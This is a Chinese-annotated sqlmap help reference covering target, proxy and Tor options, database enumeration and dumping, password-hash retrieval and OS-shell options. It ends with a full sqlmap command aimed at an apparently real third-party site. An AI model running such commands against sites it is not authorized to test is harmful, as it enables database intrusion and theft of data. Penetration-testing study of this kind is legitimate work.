sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
用法: sqlmap.py [操作]
-h, --help 查看帮助
--version 查看版本
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") #常用参数表示指定url地址。
-g GOOGLEDORK Process Google dork results as target URLs #接触google搜索引擎来爬取,需要梯子。
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST #常用语post注入参数
--cookie=COOKIE HTTP Cookie header value #cookie注入的值
--random-agent Use randomly selected HTTP User-Agent header value #随机浏览器头
--proxy=PROXY Use a proxy to connect to the target URL #代理设置,常用#重点。
--tor Use Tor anonymity network #使用T0R 也就是匿名安全网络,保护自己。
--check-tor Check to see if Tor is used properly
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value #强制指定后端数据库类型,这种情况是确保已经知道数据库类型如(oracle/MSYQL/MSMYSQL)
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1) #安全级别
--risk=RISK Risk of tests to perform (1-3, default 1)
These options can be used to tweak testing of specific SQL injection
--technique=TECH SQL injection techniques to use (default "BEUSTQ")
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner#寻找数据库系统的头信息
--current-user Retrieve DBMS current user#寻找数据库系统的有效用户
--current-db Retrieve DBMS current database#寻找数据中有效数据库
--passwords Enumerate DBMS users password hashes#枚举数据库中的密码
--tables Enumerate DBMS database tables#枚举数据库中的表
--columns Enumerate DBMS database table columns#枚举数据库的列
--schema Enumerate DBMS schema#枚举数据库中的schema(对象的集合)
--dump Dump DBMS database table entries#转储数据库的信息
--dump-all Dump all DBMS databases tables entries #转储数据库中的所有信息
-D DB DBMS database to enumerate #枚举数据库dbms
-T TBL DBMS database table(s) to enumerate#枚举数据库dbms的表
-C COL DBMS database table column(s) to enumerate#枚举数据库dbms表中的列
--is-dba            当前用户权限
  --dbs            所有数据库
Operating system access: [操作系统访问]
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell #反弹shell,需要对应权限方可。
--os-pwn Prompt for an OOB shell, Meterpreter or VNC #连接shell并用VNC模式
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behaviour #不用输入,使用默认行为(一般用于自动化扫描大量注入点)
--flush-session Flush session files for current target #清除所有session
--sqlmap-shell Prompt for an interactive sqlmap shell#启用一个交互式的shell
--wizard Simple wizard interface for beginner users #新手向导模式
D:\sqlmap>c:\Python27\python.exe sqlmap.py -u http://www.kanghu1.net/Feedback_new.asp?ArticleID=1892 --is-dba


登录 后发表评论.